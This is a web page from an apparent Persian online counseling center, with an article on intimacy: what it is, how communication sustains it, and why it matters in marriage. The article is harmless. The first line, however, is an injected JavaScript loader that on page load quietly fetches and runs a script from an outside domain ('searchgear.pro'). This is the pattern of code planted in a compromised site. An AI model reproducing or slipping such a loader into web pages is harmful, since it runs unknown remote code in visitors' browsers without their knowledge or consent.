;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); صمیمیت | مرکز مشاوره آنلاین روان‌یاری

صمیمیت

میزان پیشرفت خواندن شما

فهرست مطالب

صمیمیت چیست؟

صمیمت یک فرآیند تعاملی است که شامل تعدادی از ابعاد مرتبط به هم میباشد.محور این فرآیندشناخت،درک،پذیرش و همدلی بااحساسات فرد دیگر و قدردانی یاپذیرش دیدگاه منحصربه فرد دیگری دردنیاست.

صمیمیت،یکی از نیازهای اساسی بشربرای حفظ سلامت روانی وسازگاری روانشناختی محسوب میشود.ایجادصمیمیت یک فرآینداست نه یک رویداد مجزا.صمیمیت چیزی نیست که ما ناگهان به چنگ آوریم و آن را تاآخرعمر مثل یک گنج حفظ کنیم.صمیمیت سیال است نه ایستا.فرآیندی که طی آن ما به صمیمیت میرسیم “ارتـــــباط” است.

ارتباط از دو عنصرساده تشکیل شده است:

1.بیان افکار و احساسات خود و ابراز هرچه که در قلب و ذهن ما میگذرد.

2.دریافت افکار و احساسات طرف مقابل به عنوان اطلاعات و سعی در درک آنچه دیگری میگوید و احساس میکند.

جزء دوم نیز افکار و تجارب خود را فاش میسازد درحالیکه دیگری گوش میدهد و سعی میکند درک کند.فرآیند ساده صحبت کردن و گوش دادن حافظ صمیمیت است.

صمیمیت عبارت از رابطه نزدیک،خودمانی و معمولا محبت آمیز یا رابطه ای عاشقانه و شخصی بافرد دیگر به منظور بیان افکار و احساساتی است که به عنوان منشاء تشابه و نزدیکی بکارمیرود.همچنین صمیمیت مفهوم وسیعی است که میتواند از بحث درباره زندگی تاافشای خصوصی ترین احساسات جنسی که کسی به راحتی درمورد آن سخن نمیگوید را در بر میگیرد.صمیمیت محصول فرعی توجه کردن،پذیرفتن،حساسیت به خرج دادن و درک کردن است.بنابراین با از دست رفتن صمیمیت یکی از اتصال های زندگی زناشویی از بین میرود.

طبق پژوهش استنبرگ صمیمیت به احساساتی نظیر:

نزدیکی،پیوند دررابطه عمیق وعاشقانه اشاره دارد که میتواند به روابط زوجین گرمی بخشد.روابط خیلی صمیمانه منبع مهمی برای شادی فردی و حس معنا در زندگی است.در مقابل،کمبودصمیمیت باافسردگی،عزت نفس پایین،اظطراب و رضایت ارتباطی پایین مرتبط است.علاوه براین،اجتناب از روابط صمیمانه میتواند اثرات بدی برسلامت هیجانی داشته باشد که منجر به تنهایی،انزوای هیجانی و پاسخ های ناکارآمد به استرس میشود.

ایجاد و حفظ روابط صمیمانه امری است که تحقق بخشیدن به آن مستلزم مایه گذاشتن از خود است.به عبارت دیگر،روابط صمیمانه زمانی سالم و دیرپا خواهدبود که هریک از همراهان بتوانند به وقت لزوم،نیازهای شخصی را به نفع طرف مقابل رابطه،زیر پا بگذارد.به استثنای مواردمعدود آنچه که در کوتاه مدت از خودگذشتگی و نادیده گرفتن خود تلقی میشود،در درازمدت به گروه های قوی صمیمیت خواهد انجامید.

توانایی برقراری و حفظ صمیمیت با دیگران به افراد کمک میکند بامشکلات ارتباطی کنارآیند و روابطی رضایت بخش داشته باشند؛درحالیکه اجتناب از صمیمیت مشخصه افرادی است که روابطشان کمتررضایت بخش توصیف میکنند.کسانی که میترسند یا ازصمیمیت اجتناب میکنند،احتمالا نزدیک شدن به دیگران و برقراری روابط گرم و رضایت بخش برایشان دشوار است.

صمیمیت در ازدواج

صمیمیت کلیدداشتن ازدواجی موفق و منبع مهمی برای شادی،احساس معنا و رضایت زناشویی به شمار میرود.

این اعتقاد وجوددارد که صمیمیت ازجمله دلایل اصلی افراد در برقراری یک رابطه باهمسر و ارضای نیاز عاطفی است،چراکه داشتن روابط صمیمانه یک نیاز و انگیزه اساسی در انسان میباشد.ایجادصمیمیت و حفظ آن در ارتباط زوج ها فرآیندی سخت است که مستلزم آگاهیی دو طرفه و تلاش درعمل به مضامین آن است.

صمیمیت مداوم،یکی از پیش نیازهای مهم و خلق ازدواج ماندگار است.از این رو زمانی که صمیمیت رو به زوال میرود،شوق و توانایی حل مسائل،غلبه بر موانع و پافشاری برای مقابله با ترس ها و تردیدها به سرعت دچار فرسایش میگردند.همچنین زمانی که زوج ها به خلق،بازآفرینی و استمرارصمیمیت می پردازند،مسائل مهمی مانند تعهد،همکاری،وفاداری و مدیریت خلاقانه برتفاوت های فردی به سرعت درمیانشان ساماندهی میشود.

  چطور مثبت اندیش شوید؟
Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.